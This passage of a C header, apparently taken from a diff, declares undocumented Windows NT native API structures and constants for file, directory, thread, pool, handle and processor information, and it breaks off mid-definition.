17.09.11 EP_X0FF + +typedef struct _FILE_BASIC_INFORMATION { // ntddk wdm nthal + LARGE_INTEGER CreationTime; // ntddk wdm nthal + LARGE_INTEGER LastAccessTime; // ntddk wdm nthal + LARGE_INTEGER LastWriteTime; // ntddk wdm nthal + LARGE_INTEGER ChangeTime; // ntddk wdm nthal + ULONG FileAttributes; // ntddk wdm nthal +} FILE_BASIC_INFORMATION, *PFILE_BASIC_INFORMATION; // ntddk wdm nthal + +typedef struct _FILE_STANDARD_INFORMATION +{ + LARGE_INTEGER AllocationSize; + LARGE_INTEGER EndOfFile; + ULONG NumberOfLinks; + UCHAR DeletePending; + UCHAR Directory; +} FILE_STANDARD_INFORMATION; + +typedef struct _FILE_INTERNAL_INFORMATION { + LARGE_INTEGER IndexNumber; +} FILE_INTERNAL_INFORMATION, *PFILE_INTERNAL_INFORMATION; + +typedef struct _FILE_EA_INFORMATION { + ULONG EaSize; +} FILE_EA_INFORMATION, *PFILE_EA_INFORMATION; + +typedef struct _FILE_ACCESS_INFORMATION { + ACCESS_MASK AccessFlags; +} FILE_ACCESS_INFORMATION, *PFILE_ACCESS_INFORMATION; + +typedef struct _FILE_POSITION_INFORMATION { // ntddk wdm nthal + LARGE_INTEGER CurrentByteOffset; // ntddk wdm nthal +} FILE_POSITION_INFORMATION, *PFILE_POSITION_INFORMATION; // ntddk wdm nthal + // ntddk wdm nthal +typedef struct _FILE_MODE_INFORMATION { + ULONG Mode; +} FILE_MODE_INFORMATION, *PFILE_MODE_INFORMATION; + +typedef struct _FILE_ALIGNMENT_INFORMATION { // ntddk nthal + ULONG AlignmentRequirement; // ntddk nthal +} FILE_ALIGNMENT_INFORMATION, *PFILE_ALIGNMENT_INFORMATION; // ntddk nthal + // ntddk nthal +typedef struct _FILE_NAME_INFORMATION { // ntddk + ULONG FileNameLength; // ntddk + WCHAR FileName[1]; // ntddk +} FILE_NAME_INFORMATION, *PFILE_NAME_INFORMATION; // ntddk + +typedef struct _FILE_ALL_INFORMATION { + FILE_BASIC_INFORMATION BasicInformation; + FILE_STANDARD_INFORMATION StandardInformation; + FILE_INTERNAL_INFORMATION InternalInformation; + FILE_EA_INFORMATION EaInformation; + FILE_ACCESS_INFORMATION AccessInformation; + FILE_POSITION_INFORMATION PositionInformation; + FILE_MODE_INFORMATION ModeInformation; + FILE_ALIGNMENT_INFORMATION AlignmentInformation; + FILE_NAME_INFORMATION NameInformation; +} FILE_ALL_INFORMATION, *PFILE_ALL_INFORMATION; + +typedef struct _FILE_NETWORK_OPEN_INFORMATION { // ntddk wdm nthal + LARGE_INTEGER CreationTime; // ntddk wdm nthal + LARGE_INTEGER LastAccessTime; // ntddk wdm nthal + LARGE_INTEGER LastWriteTime; // ntddk wdm nthal + LARGE_INTEGER ChangeTime; // ntddk wdm nthal + LARGE_INTEGER AllocationSize; // ntddk wdm nthal + LARGE_INTEGER EndOfFile; // ntddk wdm nthal + ULONG FileAttributes; // ntddk wdm nthal +} FILE_NETWORK_OPEN_INFORMATION, *PFILE_NETWORK_OPEN_INFORMATION; // ntddk wdm nthal + // ntddk wdm nthal +typedef struct _FILE_ATTRIBUTE_TAG_INFORMATION { // ntddk nthal + ULONG FileAttributes; // ntddk nthal + ULONG ReparseTag; // ntddk nthal +} FILE_ATTRIBUTE_TAG_INFORMATION, *PFILE_ATTRIBUTE_TAG_INFORMATION; // ntddk nthal + // ntddk nthal +typedef struct _FILE_ALLOCATION_INFORMATION { + LARGE_INTEGER AllocationSize; +} FILE_ALLOCATION_INFORMATION, *PFILE_ALLOCATION_INFORMATION; + +typedef struct _FILE_COMPRESSION_INFORMATION { + LARGE_INTEGER CompressedFileSize; + USHORT CompressionFormat; + UCHAR CompressionUnitShift; + UCHAR ChunkShift; + UCHAR ClusterShift; + UCHAR Reserved[3]; +} FILE_COMPRESSION_INFORMATION, *PFILE_COMPRESSION_INFORMATION; + +typedef struct _FILE_DISPOSITION_INFORMATION { // ntddk nthal + BOOLEAN DeleteFile; // ntddk nthal +} FILE_DISPOSITION_INFORMATION, *PFILE_DISPOSITION_INFORMATION; // ntddk nthal + // ntddk nthal +typedef struct _FILE_END_OF_FILE_INFORMATION { // ntddk nthal + LARGE_INTEGER EndOfFile; // ntddk nthal +} FILE_END_OF_FILE_INFORMATION, *PFILE_END_OF_FILE_INFORMATION; // ntddk nthal + // ntddk nthal +typedef struct _FILE_VALID_DATA_LENGTH_INFORMATION { // ntddk nthal + LARGE_INTEGER ValidDataLength; // ntddk nthal +} FILE_VALID_DATA_LENGTH_INFORMATION, *PFILE_VALID_DATA_LENGTH_INFORMATION; // ntddk nthal + +typedef struct _FILE_LINK_INFORMATION { + BOOLEAN ReplaceIfExists; + HANDLE RootDirectory; + ULONG FileNameLength; + WCHAR FileName[1]; +} FILE_LINK_INFORMATION, *PFILE_LINK_INFORMATION; + +typedef struct _FILE_MOVE_CLUSTER_INFORMATION { + ULONG ClusterCount; + HANDLE RootDirectory; + ULONG FileNameLength; + WCHAR FileName[1]; +} FILE_MOVE_CLUSTER_INFORMATION, *PFILE_MOVE_CLUSTER_INFORMATION; + +typedef struct _FILE_RENAME_INFORMATION { + BOOLEAN ReplaceIfExists; + HANDLE RootDirectory; + ULONG FileNameLength; + WCHAR FileName[1]; +} FILE_RENAME_INFORMATION, *PFILE_RENAME_INFORMATION; + +typedef struct _FILE_STREAM_INFORMATION { + ULONG NextEntryOffset; + ULONG StreamNameLength; + LARGE_INTEGER StreamSize; + LARGE_INTEGER StreamAllocationSize; + WCHAR StreamName[1]; +} FILE_STREAM_INFORMATION, *PFILE_STREAM_INFORMATION; + +typedef struct _FILE_TRACKING_INFORMATION { + HANDLE DestinationFile; + ULONG ObjectInformationLength; + CHAR ObjectInformation[1]; +} FILE_TRACKING_INFORMATION, *PFILE_TRACKING_INFORMATION; + +typedef struct _FILE_COMPLETION_INFORMATION { + HANDLE Port; + PVOID Key; +} FILE_COMPLETION_INFORMATION, *PFILE_COMPLETION_INFORMATION; + +typedef struct _FILE_PIPE_INFORMATION { + ULONG ReadMode; + ULONG CompletionMode; +} FILE_PIPE_INFORMATION, *PFILE_PIPE_INFORMATION; + +typedef struct _FILE_PIPE_LOCAL_INFORMATION { + ULONG NamedPipeType; + ULONG NamedPipeConfiguration; + ULONG MaximumInstances; + ULONG CurrentInstances; + ULONG InboundQuota; + ULONG ReadDataAvailable; + ULONG OutboundQuota; + ULONG WriteQuotaAvailable; + ULONG NamedPipeState; + ULONG NamedPipeEnd; +} FILE_PIPE_LOCAL_INFORMATION, *PFILE_PIPE_LOCAL_INFORMATION; + +typedef struct _FILE_PIPE_REMOTE_INFORMATION { + LARGE_INTEGER CollectDataTime; + ULONG MaximumCollectionCount; +} FILE_PIPE_REMOTE_INFORMATION, *PFILE_PIPE_REMOTE_INFORMATION; + +typedef struct _FILE_MAILSLOT_QUERY_INFORMATION { + ULONG MaximumMessageSize; + ULONG MailslotQuota; + ULONG NextMessageSize; + ULONG MessagesAvailable; + LARGE_INTEGER ReadTimeout; +} FILE_MAILSLOT_QUERY_INFORMATION, *PFILE_MAILSLOT_QUERY_INFORMATION; + +typedef struct _FILE_MAILSLOT_SET_INFORMATION { + PLARGE_INTEGER ReadTimeout; +} FILE_MAILSLOT_SET_INFORMATION, *PFILE_MAILSLOT_SET_INFORMATION; + +typedef struct _FILE_REPARSE_POINT_INFORMATION { + LONGLONG FileReference; + ULONG Tag; +} FILE_REPARSE_POINT_INFORMATION, *PFILE_REPARSE_POINT_INFORMATION; + +// +// NtQuery(Set)EaFile +// +// The offset for the start of EaValue is EaName[EaNameLength + 1] +// + +// begin_ntddk begin_wdm + +typedef struct _FILE_FULL_EA_INFORMATION { + ULONG NextEntryOffset; + UCHAR Flags; + UCHAR EaNameLength; + USHORT EaValueLength; + CHAR EaName[1]; +} FILE_FULL_EA_INFORMATION, *PFILE_FULL_EA_INFORMATION; + +// end_ntddk end_wdm + +typedef struct _FILE_GET_EA_INFORMATION { + ULONG NextEntryOffset; + UCHAR EaNameLength; + CHAR EaName[1]; +} FILE_GET_EA_INFORMATION, *PFILE_GET_EA_INFORMATION; + +// +// NtQuery(Set)QuotaInformationFile +// + +typedef struct _FILE_GET_QUOTA_INFORMATION { + ULONG NextEntryOffset; + ULONG SidLength; + SID Sid; +} FILE_GET_QUOTA_INFORMATION, *PFILE_GET_QUOTA_INFORMATION; + +typedef struct _FILE_QUOTA_INFORMATION { + ULONG NextEntryOffset; + ULONG SidLength; + LARGE_INTEGER ChangeTime; + LARGE_INTEGER QuotaUsed; + LARGE_INTEGER QuotaThreshold; + LARGE_INTEGER QuotaLimit; + SID Sid; +} FILE_QUOTA_INFORMATION, *PFILE_QUOTA_INFORMATION; + +// +// NtQueryDirectoryFile return types: +// +// FILE_DIRECTORY_INFORMATION +// FILE_FULL_DIR_INFORMATION +// FILE_ID_FULL_DIR_INFORMATION +// FILE_BOTH_DIR_INFORMATION +// FILE_ID_BOTH_DIR_INFORMATION +// FILE_NAMES_INFORMATION +// FILE_OBJECTID_INFORMATION +// + +typedef struct _FILE_DIRECTORY_INFORMATION { + ULONG NextEntryOffset; + ULONG FileIndex; + LARGE_INTEGER CreationTime; + LARGE_INTEGER LastAccessTime; + LARGE_INTEGER LastWriteTime; + LARGE_INTEGER ChangeTime; + LARGE_INTEGER EndOfFile; + LARGE_INTEGER AllocationSize; + ULONG FileAttributes; + ULONG FileNameLength; + WCHAR FileName[1]; +} FILE_DIRECTORY_INFORMATION, *PFILE_DIRECTORY_INFORMATION; + +typedef struct _FILE_FULL_DIR_INFORMATION { + ULONG NextEntryOffset; + ULONG FileIndex; + LARGE_INTEGER CreationTime; + LARGE_INTEGER LastAccessTime; + LARGE_INTEGER LastWriteTime; + LARGE_INTEGER ChangeTime; + LARGE_INTEGER EndOfFile; + LARGE_INTEGER AllocationSize; + ULONG FileAttributes; + ULONG FileNameLength; + ULONG EaSize; + WCHAR FileName[1]; +} FILE_FULL_DIR_INFORMATION, *PFILE_FULL_DIR_INFORMATION; + +typedef struct _FILE_ID_FULL_DIR_INFORMATION { + ULONG NextEntryOffset; + ULONG FileIndex; + LARGE_INTEGER CreationTime; + LARGE_INTEGER LastAccessTime; + LARGE_INTEGER LastWriteTime; + LARGE_INTEGER ChangeTime; + LARGE_INTEGER EndOfFile; + LARGE_INTEGER AllocationSize; + ULONG FileAttributes; + ULONG FileNameLength; + ULONG EaSize; + LARGE_INTEGER FileId; + WCHAR FileName[1]; +} FILE_ID_FULL_DIR_INFORMATION, *PFILE_ID_FULL_DIR_INFORMATION; + +typedef struct _FILE_BOTH_DIR_INFORMATION { + ULONG NextEntryOffset; + ULONG FileIndex; + LARGE_INTEGER CreationTime; + LARGE_INTEGER LastAccessTime; + LARGE_INTEGER LastWriteTime; + LARGE_INTEGER ChangeTime; + LARGE_INTEGER EndOfFile; + LARGE_INTEGER AllocationSize; + ULONG FileAttributes; + ULONG FileNameLength; + ULONG EaSize; + CCHAR ShortNameLength; + WCHAR ShortName[12]; + WCHAR FileName[1]; +} FILE_BOTH_DIR_INFORMATION, *PFILE_BOTH_DIR_INFORMATION; + +typedef struct _FILE_ID_BOTH_DIR_INFORMATION { + ULONG NextEntryOffset; + ULONG FileIndex; + LARGE_INTEGER CreationTime; + LARGE_INTEGER LastAccessTime; + LARGE_INTEGER LastWriteTime; + LARGE_INTEGER ChangeTime; + LARGE_INTEGER EndOfFile; + LARGE_INTEGER AllocationSize; + ULONG FileAttributes; + ULONG FileNameLength; + ULONG EaSize; + CCHAR ShortNameLength; + WCHAR ShortName[12]; + LARGE_INTEGER FileId; + WCHAR FileName[1]; +} FILE_ID_BOTH_DIR_INFORMATION, *PFILE_ID_BOTH_DIR_INFORMATION; + +typedef struct _FILE_NAMES_INFORMATION { + ULONG NextEntryOffset; + ULONG FileIndex; + ULONG FileNameLength; + WCHAR FileName[1]; +} FILE_NAMES_INFORMATION, *PFILE_NAMES_INFORMATION; + +typedef struct _FILE_OBJECTID_INFORMATION { + LONGLONG FileReference; + UCHAR ObjectId[16]; + union { + struct { + UCHAR BirthVolumeId[16]; + UCHAR BirthObjectId[16]; + UCHAR DomainId[16]; + } ; + UCHAR ExtendedInfo[48]; + }; +} FILE_OBJECTID_INFORMATION, *PFILE_OBJECTID_INFORMATION; + + +// +// SYSTEM_INFORMATION +// + +typedef struct _SYSTEM_GDI_DRIVER_INFORMATION +{ + UNICODE_STRING DriverName; + PVOID ImageAddress; + PVOID SectionPointer; + PVOID EntryPoint; + PIMAGE_EXPORT_DIRECTORY ExportSectionPointer; + ULONG ImageLength; +} SYSTEM_GDI_DRIVER_INFORMATION, *PSYSTEM_GDI_DRIVER_INFORMATION; + +typedef struct _SYSTEM_EXCEPTION_INFORMATION +{ + ULONG AlignmentFixupCount; + ULONG ExceptionDispatchCount; + ULONG FloatingEmulationCount; + ULONG ByteWordEmulationCount; +} SYSTEM_EXCEPTION_INFORMATION, *PSYSTEM_EXCEPTION_INFORMATION; + +// +// taken from http://www.acc.umu.se/~bosse/ntifs.h - contents are questionable. +// + +typedef enum _THREAD_STATE +{ + StateInitialized, + StateReady, + StateRunning, + StateStandby, + StateTerminated, + StateWait, + StateTransition, + StateUnknown +} THREAD_STATE; + +typedef enum _KWAIT_REASON { + Executive, + FreePage, + PageIn, + PoolAllocation, + DelayExecution, + Suspended, + UserRequest, + WrExecutive, + WrFreePage, + WrPageIn, + WrPoolAllocation, + WrDelayExecution, + WrSuspended, + WrUserRequest, + WrEventPair, + WrQueue, + WrLpcReceive, + WrLpcReply, + WrVirtualMemory, + WrPageOut, + WrRendezvous, + Spare2, + Spare3, + Spare4, + Spare5, + Spare6, + WrKernel, + WrResource, + WrPushLock, + WrMutex, + WrQuantumEnd, + WrDispatchInt, + WrPreempted, + WrYieldExecution, + WrFastMutex, + WrGuardedMutex, + WrRundown, + MaximumWaitReason +} KWAIT_REASON; + +//FIXED 21.02.2011 size for x64/x86 +typedef struct _SYSTEM_THREAD_INFORMATION { + LARGE_INTEGER KernelTime; + LARGE_INTEGER UserTime; + LARGE_INTEGER CreateTime; + ULONG WaitTime; + PVOID StartAddress; + CLIENT_ID ClientId; + KPRIORITY Priority; + KPRIORITY BasePriority; + ULONG ContextSwitchCount; + THREAD_STATE State; + KWAIT_REASON WaitReason; +} SYSTEM_THREAD_INFORMATION, *PSYSTEM_THREAD_INFORMATION; + +typedef struct _SYSTEM_EXTENDED_THREAD_INFORMATION { + SYSTEM_THREAD_INFORMATION ThreadInfo; + PVOID StackBase; + PVOID StackLimit; + PVOID Win32StartAddress; + ULONG_PTR Reserved1; + ULONG_PTR Reserved2; + ULONG_PTR Reserved3; + ULONG_PTR Reserved4; +} SYSTEM_EXTENDED_THREAD_INFORMATION, *PSYSTEM_EXTENDED_THREAD_INFORMATION; + +typedef struct _SYSTEM_POOL_ENTRY { + BOOLEAN Allocated; + BOOLEAN Spare0; + USHORT AllocatorBackTraceIndex; + ULONG Size; + union { + UCHAR Tag[4]; + ULONG TagUlong; + PVOID ProcessChargedQuota; + }; +} SYSTEM_POOL_ENTRY, *PSYSTEM_POOL_ENTRY; + +typedef struct _SYSTEM_POOL_INFORMATION { + SIZE_T TotalSize; + PVOID FirstEntry; + USHORT EntryOverhead; + BOOLEAN PoolTagPresent; + BOOLEAN Spare0; + ULONG NumberOfEntries; + SYSTEM_POOL_ENTRY Entries[1]; +} SYSTEM_POOL_INFORMATION, *PSYSTEM_POOL_INFORMATION; + +typedef struct _SYSTEM_POOLTAG { + union { + UCHAR Tag[4]; + ULONG TagUlong; + }; + ULONG PagedAllocs; + ULONG PagedFrees; + SIZE_T PagedUsed; + ULONG NonPagedAllocs; + ULONG NonPagedFrees; + SIZE_T NonPagedUsed; +} SYSTEM_POOLTAG, *PSYSTEM_POOLTAG; + +typedef struct _SYSTEM_BIGPOOL_ENTRY { + union { + PVOID VirtualAddress; + ULONG_PTR NonPaged : 1; // Set to 1 if entry is nonpaged. + }; + SIZE_T SizeInBytes; + union { + UCHAR Tag[4]; + ULONG TagUlong; + }; +} SYSTEM_BIGPOOL_ENTRY, *PSYSTEM_BIGPOOL_ENTRY; + +typedef struct _SYSTEM_POOLTAG_INFORMATION +{ + ULONG Count; + SYSTEM_POOLTAG TagInfo[ 1 ]; +} SYSTEM_POOLTAG_INFORMATION, *PSYSTEM_POOLTAG_INFORMATION; + +typedef struct _SYSTEM_SESSION_POOLTAG_INFORMATION { + SIZE_T NextEntryOffset; + ULONG SessionId; + ULONG Count; + SYSTEM_POOLTAG TagInfo[ 1 ]; +} SYSTEM_SESSION_POOLTAG_INFORMATION, *PSYSTEM_SESSION_POOLTAG_INFORMATION; + +typedef struct _SYSTEM_BIGPOOL_INFORMATION { + ULONG Count; + SYSTEM_BIGPOOL_ENTRY AllocatedInfo[ 1 ]; +} SYSTEM_BIGPOOL_INFORMATION, *PSYSTEM_BIGPOOL_INFORMATION; + +typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO +{ + USHORT UniqueProcessId; + USHORT CreatorBackTraceIndex; + UCHAR ObjectTypeIndex; + UCHAR HandleAttributes; + USHORT HandleValue; + PVOID Object; + ULONG GrantedAccess; +} SYSTEM_HANDLE_TABLE_ENTRY_INFO, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO; + +typedef struct _SYSTEM_HANDLE_INFORMATION +{ + ULONG NumberOfHandles; + SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[ 1 ]; +} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION; + +typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX +{ + PVOID Object; + ULONG UniqueProcessId; + ULONG HandleValue; + ULONG GrantedAccess; + USHORT CreatorBackTraceIndex; + USHORT ObjectTypeIndex; + ULONG HandleAttributes; + ULONG Reserved; +} SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX; + +typedef struct _SYSTEM_HANDLE_INFORMATION_EX +{ + ULONG NumberOfHandles; + ULONG Reserved; + struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[ 1 ]; +} SYSTEM_HANDLE_INFORMATION_EX, *PSYSTEM_HANDLE_INFORMATION_EX; + +typedef struct _SYSTEM_SPECIAL_POOL_INFORMATION +{ + ULONG PoolTag; + ULONG Flags; +} SYSTEM_SPECIAL_POOL_INFORMATION, *PSYSTEM_SPECIAL_POOL_INFORMATION; + +typedef struct _SYSTEM_OBJECTTYPE_INFORMATION +{ + ULONG NextEntryOffset; + ULONG NumberOfObjects; + ULONG NumberOfHandles; + ULONG TypeIndex; + ULONG InvalidAttributes; + GENERIC_MAPPING GenericMapping; + ULONG ValidAccessMask; + ULONG PoolType; + UCHAR SecurityRequired; + UCHAR WaitableObject; + UNICODE_STRING TypeName; +} SYSTEM_OBJECTTYPE_INFORMATION, *PSYSTEM_OBJECTTYPE_INFORMATION; + +typedef struct _SYSTEM_HIBERFILE_INFORMATION +{ + ULONG NumberOfMcbPairs; + LARGE_INTEGER Mcb[ 1 ]; +} SYSTEM_HIBERFILE_INFORMATION, *PSYSTEM_HIBERFILE_INFORMATION; + +typedef struct _SYSTEM_KERNEL_DEBUGGER_INFORMATION { + BOOLEAN KernelDebuggerEnabled; + BOOLEAN KernelDebuggerNotPresent; +} SYSTEM_KERNEL_DEBUGGER_INFORMATION, *PSYSTEM_KERNEL_DEBUGGER_INFORMATION; + +typedef struct _SYSTEM_REGISTRY_QUOTA_INFORMATION { + ULONG RegistryQuotaAllowed; + ULONG RegistryQuotaUsed; + SIZE_T PagedPoolSize; +} SYSTEM_REGISTRY_QUOTA_INFORMATION, *PSYSTEM_REGISTRY_QUOTA_INFORMATION; + +typedef struct _SYSTEM_CONTEXT_SWITCH_INFORMATION { + ULONG ContextSwitches; + ULONG FindAny; + ULONG FindLast; + ULONG FindIdeal; + ULONG IdleAny; + ULONG IdleCurrent; + ULONG IdleLast; + ULONG IdleIdeal; + ULONG PreemptAny; + ULONG PreemptCurrent; + ULONG PreemptLast; + ULONG SwitchToIdle; +} SYSTEM_CONTEXT_SWITCH_INFORMATION, *PSYSTEM_CONTEXT_SWITCH_INFORMATION; + +typedef struct _SYSTEM_SESSION_MAPPED_VIEW_INFORMATION { + SIZE_T NextEntryOffset; + ULONG SessionId; + ULONG ViewFailures; + SIZE_T NumberOfBytesAvailable; + SIZE_T NumberOfBytesAvailableContiguous; +} SYSTEM_SESSION_MAPPED_VIEW_INFORMATION, *PSYSTEM_SESSION_MAPPED_VIEW_INFORMATION; + +typedef struct _SYSTEM_INTERRUPT_INFORMATION { + ULONG ContextSwitches; + ULONG DpcCount; + ULONG DpcRate; + ULONG TimeIncrement; + ULONG DpcBypassCount; + ULONG ApcBypassCount; +} SYSTEM_INTERRUPT_INFORMATION, *PSYSTEM_INTERRUPT_INFORMATION; + +typedef struct _SYSTEM_DPC_BEHAVIOR_INFORMATION { + ULONG Spare; + ULONG DpcQueueDepth; + ULONG MinimumDpcRate; + ULONG AdjustDpcThreshold; + ULONG IdealDpcRate; +} SYSTEM_DPC_BEHAVIOR_INFORMATION, *PSYSTEM_DPC_BEHAVIOR_INFORMATION; + +typedef struct _SYSTEM_LOOKASIDE_INFORMATION { + USHORT CurrentDepth; + USHORT MaximumDepth; + ULONG TotalAllocates; + ULONG AllocateMisses; + ULONG TotalFrees; + ULONG FreeMisses; + ULONG Type; + ULONG Tag; + ULONG Size; +} SYSTEM_LOOKASIDE_INFORMATION, *PSYSTEM_LOOKASIDE_INFORMATION; + +typedef struct _SYSTEM_LEGACY_DRIVER_INFORMATION { + ULONG VetoType; + UNICODE_STRING VetoList; +} SYSTEM_LEGACY_DRIVER_INFORMATION, *PSYSTEM_LEGACY_DRIVER_INFORMATION; + +typedef struct _SYSTEM_VDM_INSTEMUL_INFO +{ + ULONG SegmentNotPresent; + ULONG VdmOpcode0F; + ULONG OpcodeESPrefix; + ULONG OpcodeCSPrefix; + ULONG OpcodeSSPrefix; + ULONG OpcodeDSPrefix; + ULONG OpcodeFSPrefix; + ULONG OpcodeGSPrefix; + ULONG OpcodeOPER32Prefix; + ULONG OpcodeADDR32Prefix; + ULONG OpcodeINSB; + ULONG OpcodeINSW; + ULONG OpcodeOUTSB; + ULONG OpcodeOUTSW; + ULONG OpcodePUSHF; + ULONG OpcodePOPF; + ULONG OpcodeINTnn; + ULONG OpcodeINTO; + ULONG OpcodeIRET; + ULONG OpcodeINBimm; + ULONG OpcodeINWimm; + ULONG OpcodeOUTBimm; + ULONG OpcodeOUTWimm; + ULONG OpcodeINB; + ULONG OpcodeINW; + ULONG OpcodeOUTB; + ULONG OpcodeOUTW; + ULONG OpcodeLOCKPrefix; + ULONG OpcodeREPNEPrefix; + ULONG OpcodeREPPrefix; + ULONG OpcodeHLT; + ULONG OpcodeCLI; + ULONG OpcodeSTI; + ULONG BopCount; +} SYSTEM_VDM_INSTEMUL_INFO, *PSYSTEM_VDM_INSTEMUL_INFO; + +typedef struct _SYSTEM_TIMEOFDAY_INFORMATION +{ + LARGE_INTEGER BootTime; + LARGE_INTEGER CurrentTime; + LARGE_INTEGER TimeZoneBias; + ULONG TimeZoneId; + ULONG Reserved; + ULONGLONG BootTimeBias; + ULONGLONG SleepTimeBias; +} SYSTEM_TIMEOFDAY_INFORMATION, *PSYSTEM_TIMEOFDAY_INFORMATION; + +#if defined(_M_X64) +typedef ULONG SYSINF_PAGE_COUNT; +#else +typedef SIZE_T SYSINF_PAGE_COUNT; +#endif + +typedef struct _SYSTEM_BASIC_INFORMATION { + ULONG Reserved; + ULONG TimerResolution; + ULONG PageSize; + SYSINF_PAGE_COUNT NumberOfPhysicalPages; + SYSINF_PAGE_COUNT LowestPhysicalPageNumber; + SYSINF_PAGE_COUNT HighestPhysicalPageNumber; + ULONG AllocationGranularity; + ULONG_PTR MinimumUserModeAddress; + ULONG_PTR MaximumUserModeAddress; + ULONG_PTR ActiveProcessorsAffinityMask; + CCHAR NumberOfProcessors; +} SYSTEM_BASIC_INFORMATION, *PSYSTEM_BASIC_INFORMATION; + +typedef struct _SYSTEM_PROCESSOR_INFORMATION { + USHORT ProcessorArchitecture; + USHORT ProcessorLevel; + USHORT ProcessorRevision; + USHORT Reserved; + ULONG ProcessorFeatureBits; +} SYSTEM_PROCESSOR_INFORMATION, *PSYSTEM_PROCESSOR_INFORMATION; + +typedef struct _SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION { + LARGE_INTEGER IdleTime; + LARGE_INTEGER KernelTime; + LARGE_INTEGER UserTime; + LARGE_INTEGER DpcTime; // Checked Build + LARGE_INTEGER InterruptTime; // Checked Build + ULONG InterruptCount; +} SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION, *PSYSTEM_PROCESSOR_PERFORMANCE_INFORMATION; + +typedef struct _SYSTEM_PROCESSOR_IDLE_INFORMATION { + ULONGLONG IdleTime; + ULONGLONG C1Time; + ULONGLONG C2Time; + ULONGLONG C3Time; + ULONG C1Transitions; + ULONG C2Transitions; + ULONG C3Transitions; + ULONG Padding; +} SYSTEM_PROCESSOR_IDLE_INFORMATION, *PSYSTEM_PROCESSOR_IDLE_INFORMATION; + +typedef struct _SYSTEM_NUMA_INFORMATION { + ULONG HighestNodeNumber; + ULONG Reserved; + union { + ULONG64 ActiveProcessorsAffinityMask[ 16 ]; + ULONG64 AvailableMemory[ 16 ]; + }; +} SYSTEM_NUMA_INFORMATION, *PSYSTEM_NUMA_INFORMATION; + +#if !defined(_WINNT_) + +typedef enum _LOGICAL_PROCESSOR_RELATIONSHIP +{ + RelationProcessorCore, + RelationNumaNode, + RelationCache, + RelationProcessorPackage +} LOGICAL_PROCESSOR_RELATIONSHIP; + +typedef enum _PROCESSOR_CACHE_TYPE +{ + CacheUnified, + CacheInstruction, + CacheData, + CacheTrace +} PROCESSOR_CACHE_TYPE; + +#define CACHE_FULLY_ASSOCIATIVE 0xFF + +typedef struct _CACHE_DESCRIPTOR +{ + BYTE Level; + BYTE Associativity; + WORD LineSize; + DWORD Size; + PROCESSOR_CACHE_TYPE Type; +} CACHE_DESCRIPTOR, *PCACHE_DESCRIPTOR; + +typedef struct _SYSTEM_LOGICAL_PROCESSOR_INFORMATION { + ULONG_PTR ProcessorMask; + LOGICAL_PROCESSOR_RELATIONSHIP Relationship; + union { + struct { + BYTE Flags; + } ProcessorCore; + struct { + DWORD NodeNumber; + } NumaNode; + CACHE_DESCRIPTOR Cache; + ULONGLONG Reserved[2]; + }; +} SYSTEM_LOGICAL_PROCESSOR_INFORMATION, *PSYSTEM_LOGICAL_PROCESSOR_INFORMATION; + +#define PROCESSOR_INTEL_386 386 +#define PROCESSOR_INTEL_486 486 +#define PROCESSOR_INTEL_PENTIUM 586 +#define PROCESSOR_INTEL_IA64 2200 +#define PROCESSOR_AMD_X8664 8664 +#define PROCESSOR_MIPS_R4000 4000 // incl R4101 & R3910 for Windows CE +#define PROCESSOR_ALPHA_21064 21064 +#define PROCESSOR_PPC_601 601 +#define PROCESSOR_PPC_603 603 +#define PROCESSOR_PPC_604 604 +#define PROCESSOR_PPC_620 620 +#define PROCESSOR_HITACHI_SH3 10003 // Windows CE +#define PROCESSOR_HITACHI_SH3E 10004 // Windows CE +#define PROCESSOR_HITACHI_SH4 10005 // Windows CE +#define PROCESSOR_MOTOROLA_821 821 // Windows CE +#define PROCESSOR_SHx_SH3 103 // Windows CE +#define PROCESSOR_SHx_SH4 104 // Windows CE +#define PROCESSOR_STRONGARM 2577 // Windows CE - 0xA11 +#define PROCESSOR_ARM720 1824 // Windows CE - 0x720 +#define PROCESSOR_ARM820 2080 // Windows CE - 0x820 +#define PROCESSOR_ARM920 2336 // Windows CE - 0x920 +#define PROCESSOR_ARM_7TDMI 70001 // Windows CE +#define PROCESSOR_OPTIL 0x494f // MSIL + +#define PROCESSOR_ARCHITECTURE_INTEL 0 +#define PROCESSOR_ARCHITECTURE_MIPS 1 +#define PROCESSOR_ARCHITECTURE_ALPHA 2 +#define PROCESSOR_ARCHITECTURE_PPC 3 +#define PROCESSOR_ARCHITECTURE_SHX 4 +#define PROCESSOR_ARCHITECTURE_ARM 5 +#define PROCESSOR_ARCHITECTURE_IA64 6 +#define PROCESSOR_ARCHITECTURE_ALPHA64 7 +#define PROCESSOR_ARCHITECTURE_MSIL 8 +#define PROCESSOR_ARCHITECTURE_AMD64 9 +#define PROCESSOR_ARCHITECTURE_IA32_ON_WIN64 10 + +#define PROCESSOR_ARCHITECTURE_UNKNOWN 0xFFFF + +#define PF_FLOATING_POINT_PRECISION_ERRATA 0 +#define PF_FLOATING_POINT_EMULATED 1 +#define PF_COMPARE_EXCHANGE_DOUBLE 2 +#define PF_MMX_INSTRUCTIONS_AVAILABLE 3 +#define PF_PPC_MOVEMEM_64BIT_OK 4 +#define PF_ALPHA_BYTE_INSTRUCTIONS 5 +#define PF_XMMI_INSTRUCTIONS_AVAILABLE 6 +#define PF_3DNOW_INSTRUCTIONS_AVAILABLE 7 +#define PF_RDTSC_INSTRUCTION_AVAILABLE 8 +#define PF_PAE_ENABLED 9 +#define PF_XMMI64_INSTRUCTIONS_AVAILABLE 10 +#define PF_SSE_DAZ_MODE_AVAILABLE 11 +#define PF_NX_ENABLED 12 +#define PF_SSE3_INSTRUCTIONS_AVAILABLE 13 +#define PF_COMPARE_EXCHANGE128 14 +#define PF_COMPARE64_EXCHANGE128 15 +#define PF_CHANNELS_ENABLED 16 + +typedef struct _MEMORY_BASIC_INFORMATION +{ + PVOID BaseAddress; + PVOID AllocationBase; + DWORD AllocationProtect; + SIZE_T RegionSize; + DWORD State; + DWORD Protect; + DWORD Type; +} MEMORY_BASIC_INFORMATION, 